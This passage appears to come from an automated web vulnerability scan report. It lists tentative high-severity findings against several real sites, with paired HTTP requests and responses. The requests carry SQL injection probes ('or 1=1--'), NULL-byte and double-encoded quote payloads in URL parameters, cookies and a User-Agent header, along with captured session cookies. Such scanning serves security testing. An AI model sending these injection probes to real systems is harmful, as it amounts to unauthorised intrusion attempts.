       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
Mint.save();

Request 2

GET /_mint/?js HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: https://client.trafficshaping.com/signin
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d2--%20
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response 2

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:19 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:52:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com
Content-Length: 2015
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://www.trafficshaping.com/_mint/?record&key=4455513933353556785a75734b5367744a32383868616979393231';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
Mint.save();

1.10. http://duckduckgo.com/ie/v1/api/oembed [urls parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://duckduckgo.com
Path:   /ie/v1/api/oembed

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20%00'&maxwidth=600&format=json&callback=nreb&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 504 Gateway Time-out
Server: nginx
Date: Tue, 01 Mar 2011 02:01:37 GMT
Content-Type: text/html
Content-Length: 4637
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="canonical" href="http://duckduckgo.com/"/><meta http-equiv="content-type" content="text
...[SNIP]...
<div id="error">
...[SNIP]...

Request 2

GET /ie/v1/api/oembed?urls=http://www.amazon.com/Labor-Day-Novel-Joyce-Maynard/dp/0061843415?tag=duckduckgo-d-20%00''&maxwidth=600&format=json&callback=nreb&wmode=window HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/?q=labor+day
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:01:40 GMT
Content-Type: application/json
Connection: keep-alive
Content-Length: 4275
Etag: "2016ae18671a1b7b5e0ddeaa2c318965da72dc98"

nreb([{"provider_url": "http://www.amazon.com", "description": "Amazon.com: Labor Day: A Novel (P.S.) (9780061843419): Joyce Maynard: Books", "title": "Labor Day: A Novel (P.S.)", "url": "http://www.a
...[SNIP]...

1.11. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ga_vid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:53:54 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10985

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div class=adb>See How the GMC Terrain Stacks Up Against the Tucson. Compare Now!</div>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860%2527%2527&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:53:55 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 11041

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.12. http://googleads.g.doubleclick.net/pagead/ads [u_w parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00'&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:59:52 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 10976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div class=adb>Exceptional Engine Protection For Your Classic Vehicle.</div>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-2720111371110786&output=html&h=60&slotname=9367320272&w=234&lmt=1298774527&flash=10.2.154&url=http%3A%2F%2Fwww.thedetroitbureau.com%2Fabout-us%2F&dt=1298752927948&shv=r20101117&jsv=r20110208&saldr=1&prev_slotnames=9745053000%2C1777365721&correlator=1298752927865&frm=0&adk=2212307865&ga_vid=1929730161.1298752860&ga_sid=1298752860&ga_hid=1804039218&ga_fc=1&u_tz=-360&u_his=7&u_java=1&u_h=1200&u_w=1920%00''&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1421&bih=954&ref=http%3A%2F%2Fwww.thedetroitbureau.com%2F2011%2F02%2Finsurer-wants-fbi-to-pay-750000-for-crashed-ferrari%2F&fu=0&ifi=3&dtd=2&xpc=G3hbhrtKB2&p=http%3A//www.thedetroitbureau.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedetroitbureau.com/about-us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 20:59:53 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14565

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#ffffff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.13. http://o.aolcdn.com/os_merge/ [file parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://o.aolcdn.com
Path:   /os_merge/

Request 1

GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/skin/slick-redux/222084
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 1835
Cache-Control: public, max-age=30
Expires: Sun, 27 Feb 2011 17:46:13 GMT
Date: Sun, 27 Feb 2011 17:45:43 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Apache Tomcat/5.5.25 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 400 - Skipping file. File is not a text file. Only text files can be merged.
: file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.new.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>Skipping file. File is not a text file. Only text files can be merged.
: file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.new.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooksocial.min.js</u></p><p><b>description</b> <u>The request sent by the client was syntactically incorrect (Skipping file. File is not a text file. Only text files can be merged.
: file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d1--%20&amp;file=/aol/jquery.inlinecss-1.0.min.js&amp;file=/aol/jquery.addthis.new.js&amp;file=/aol/jquery.sonar.min.js&amp;file=/aol/jquery.facebooks
...[SNIP]...

Request 2

GET /os_merge/?file=/aol/jquery.getjs-1.0.min.js80562684'%20or%201%3d2--%20&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.addthis.new.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js HTTP/1.1
Host: o.aolcdn.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/skin/slick-redux/222084
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 26 Jan 2011 20:59:41 GMT
Content-Type: text/plain
Cache-Control: public, max-age=2592000
Expires: Tue, 29 Mar 2011 17:45:43 GMT
Date: Sun, 27 Feb 2011 17:45:43 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 15821

...[SNIP]...

1.14. http://peoplepond.com/_mint/ [MintUnique cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://peoplepond.com
Path:   /_mint/

Request 1

GET /_mint/?js HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d1--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200

Response 1

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:04 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:44:04 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com
Content-Length: 5171
Connection: close
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://peoplepond.com/_mint/?record&key=343430744850704d4435326e6e73383850754b394350495a4d61673231';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.UserAgent007 =
{
   versionHigh            : 16,
   flashVersion        : 0,
   resolution            : '0x0',
   detectFlashVersion    : function ()
   {
       var ua = navigator.userAgent.toLowerCase();
       if (navigator.plug
...[SNIP]...

Request 2

GET /_mint/?js HTTP/1.1
Host: peoplepond.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=b452c47d22569f4373c9b3b74c244667; MintAcceptsCookies=1; MintUnique=1%20and%201%3d2--%20; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200

Response 2

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:44:08 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:44:08 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.peoplepond.com
Content-Length: 5161
Connection: close
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://peoplepond.com/_mint/?record&key=383430353263524c3861594c76386f69676f565539326b31';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
   if (debug) { window.open(path+'&debug&errors', 'MintLiveDebug'+now.getTime()); return; };
   
   var ie = /*@cc_on!@*/0;
   if (!ie && document.getElementsByTagName && (document.createElementNS || document.createElement))
   {
       var tag = (document.createElementNS) ? document.createElementNS('http://www.w3.org/1999/xhtml', 'script') : document.createElement('script');
       tag.type = 'text/javascript';
       tag.src = path + '&serve_js';
       document.getElementsByTagName('head')[0].appendChild(tag);
   }
   else if (document.write)
   {
       document.write('<' + 'script type="text/javascript" src="' + path + '&amp;serve_js"><' + '/script>');
   };
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.Referrer =
{
   onsave    : function()
   {
       var encoded = 0;
       if (typeof Mint_SI_DocumentTitle == 'undefined') { Mint_SI_DocumentTitle = document.title; }
       else { encoded = 1; };
       var referer        = (window.decodeURI)?window.decodeURI(document.referrer):document.referrer;
       var resource    = (window.decodeURI)?window.decodeURI(document.URL):document.URL;
       return '&referer=' + escape(referer) + '&resource=' + escape(resource) + '&resource_title=' + escape(Mint_SI_DocumentTitle) + '&resource_title_encoded=' + encoded;
   }
};
if (!Mint.SI) { Mint.SI = new Object(); }
Mint.SI.UserAgent007 =
{
   versionHigh            : 16,
   flashVersion        : 0,
   resolution            : '0x0',
   detectFlashVersion    : function ()
   {
       var ua = navigator.userAgent.toLowerCase();
       if (navigator.plugins && nav
...[SNIP]...

1.15. http://shop.winamp.com/store [BIGipServerp-drh-dc1pod5-pool1-active cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://shop.winamp.com
Path:   /store

Remediation detail

There is probably no need to perform a second URL-decode of the value of the BIGipServerp-drh-dc1pod5-pool1-active cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /store?Action=DisplayProductInterstitialDetailsPage&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500 HTTP/1.1
Host: shop.winamp.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000%2527; s_pers=%20s_getnr%3D1298828696675-New%7C1361900696675%3B%20s_nrgvo%3DNew%7C1361900696677%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response 1

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
